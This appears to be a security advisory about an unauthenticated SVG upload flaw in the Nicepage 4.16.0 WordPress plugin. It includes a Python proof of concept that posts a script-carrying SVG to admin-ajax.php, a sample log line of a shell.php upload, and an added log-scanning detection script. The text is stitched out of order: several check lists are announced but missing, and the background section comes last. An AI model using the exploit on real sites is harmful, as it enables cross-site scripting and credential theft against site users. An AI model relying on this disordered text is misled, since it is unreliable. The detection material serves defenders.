If you have used Nicepage plugin 4.16.0, perform the following checks:
As of publication, our telemetry (from Sucuri's SiteCheck, Wordfence, and public Intezer reports) shows low active exploitation:
However, threat actors have integrated the exploit into automated scanners like WPScan and Nuclei templates as of April 2026. Expect increased noise.
The following simplified Python snippet demonstrates the unauthenticated SVG upload (truncated for safety):

import requests

# Placeholder target from the original snippet: the plugin's AJAX endpoint
target_url = "https://target-site.com/wp-admin/admin-ajax.php"

# SVG carrying inline script; the file is accepted as an image but executes in the browser
payload_svg = '''<svg xmlns="http://www.w3.org/2000/svg" onload="alert('XSS')">
  <script>alert('Nicepage 4.16.0 Exploit')</script>
</svg>'''

files = {'svg_file': ('malicious.svg', payload_svg, 'image/svg+xml')}
data = {'action': 'nicepage_upload_svg'}

response = requests.post(target_url, data=data, files=files)
print(response.text)
In a real attack, the onload script would redirect to a credential harvester or exploit a browser vulnerability.
Search your access logs for admin-ajax.php requests containing strings like:
Example suspicious log entry:
192.168.1.100 - - [12/Jan/2025:13:45:22] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 1234 "Mozilla/5.0" "cmd=upload&file=shell.php"
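As an added detection example (not part of the original article), the following Python script parses log entries of the shape shown above and flags admin-ajax.php POSTs whose parameters reference the nicepage_upload_svg action, an SVG upload or a PHP filename. It assumes a custom log format that records the request parameters in the trailing quoted field, and the sample lines are constructed.

```python
import re

# Regex for the log shape shown in the entry above: client, timestamp, request
# line, status, size, user agent and a trailing quoted field with the request
# parameters. (Assumption: that last field comes from a custom LogFormat; stock
# combined logs do not record POST bodies, so check your server configuration.)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<ua>[^"]*)"(?: "(?P<params>[^"]*)")?$'
)

# Indicators taken from this page: the AJAX action used by the PoC, the SVG
# vector, and PHP filenames (a webshell drop is the usual follow-on goal).
INDICATORS = {
    "nicepage_upload_svg": "Nicepage SVG upload action",
    ".svg": "SVG file reference",
    ".php": "PHP filename in upload parameters",
}

def scan_line(line):
    """Return a finding dict for a suspicious admin-ajax.php POST, else None."""
    m = LOG_RE.match(line.strip())
    if not m or m["method"] != "POST":
        return None
    if not m["path"].split("?")[0].endswith("/wp-admin/admin-ajax.php"):
        return None
    params = (m["params"] or "").lower()
    reasons = [why for needle, why in INDICATORS.items() if needle in params]
    if "upload" in params and not reasons:
        reasons.append("generic upload parameter")
    return {"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]), "reasons": reasons} if reasons else None

def scan_log(lines):
    """Scan an iterable of log lines; returns findings in file order."""
    return [f for f in map(scan_line, lines) if f]

# Constructed sample log: the page's example entry, a benign heartbeat, and a
# request matching the upload action from the PoC.
SAMPLE_LOG = """\
192.168.1.100 - - [12/Jan/2025:13:45:22] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 1234 "Mozilla/5.0" "cmd=upload&file=shell.php"
10.0.0.5 - - [12/Jan/2025:13:46:01] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 87 "Mozilla/5.0" "action=heartbeat"
203.0.113.7 - - [12/Jan/2025:13:47:10] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 512 "python-requests/2.31" "action=nicepage_upload_svg&svg_file=malicious.svg"
""".splitlines()

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f'{f["ts"]} {f["ip"]} status={f["status"]}: {", ".join(f["reasons"])}')
```

A 200 status on a flagged entry means the upload was accepted, so check the uploads directory for the referenced file as the next step.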
If you suspect your site was compromised via the Nicepage 4.16.0 exploit, perform the following forensic checks:
Before diving into the exploit, it is essential to understand the software architecture. Nicepage is a desktop website builder available for Windows, Mac, and Linux. It also offers a companion plugin for WordPress and a theme for Joomla. The software works on a "save locally, publish remotely" model. Users design websites locally (creating .nicepage files) and then export them as HTML/CSS or synchronize them with a CMS via an API.
Version 4.16.0, released in late 2025, was a significant update that introduced dynamic content widgets, improved SVG handling, and a new "remote publish" protocol.